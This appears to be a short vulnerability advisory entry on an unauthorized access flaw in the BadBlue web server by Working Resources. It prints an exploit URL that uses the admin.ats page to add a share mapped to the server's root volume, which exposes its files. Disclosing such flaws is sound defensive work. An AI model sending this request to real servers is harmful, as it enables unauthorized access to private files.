Working Resources BadBlue Unauthorized HTS Access Vulnerability

info
discussion
exploit
solution
references

Working Resources BadBlue Unauthorized HTS Access Vulnerability

The issue may be exploited with a web browser. The following example was submitted:

http://www.example.com/ext.dll?mfcisapicommand=loadpage&page=admin.ats&a0=add&a1=root&a2=%5C

This example will reveal the contents of the server's primary volume.